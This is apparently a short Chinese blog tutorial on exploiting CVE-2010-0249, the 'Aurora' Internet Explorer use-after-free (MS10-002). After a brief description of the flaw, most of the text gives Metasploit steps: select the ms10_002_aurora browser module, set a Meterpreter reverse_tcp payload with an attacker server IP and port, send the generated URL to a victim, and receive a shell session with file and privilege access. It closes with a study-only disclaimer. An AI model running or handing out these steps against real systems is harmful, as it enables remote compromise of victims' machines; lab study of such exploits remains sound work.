CVE-2010-0249 简单利用

漏洞详情

微软官方发布了Microsoft Security Advisory (979352)安全公告，确认在IE6/7/8版本中，存在零日漏洞，涉及的操作系统包括：Windows 2000 SP4, Windows XP/2003/Vista/2008，Windows 7。微软在安全公告中表示，IE在特定情况下，有可能访问已经被释放的内存对象导致任意代码执行，该漏洞可以被用来进行网页挂马。该漏洞即后来被称为“Aurora”（极光）的零日漏洞。

漏洞利用
kali打开msf，搜索MS10-002的漏洞利用模块后进入

exploit/windows/browser/ms10_002_aurora模块。

设置并查看参数
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.1.70
set srvport 7070
show options

参数设置没问题后输入run执行，复制URL发给目标。

用IE打开URL返回kali查看结果

kali已经成功和目标服务器创建一个会话，查看文件及权限。

利用成功，可以返回当前用户信息

注：本实验不得用于商业用途,仅做学习交流，一切后果自行承担。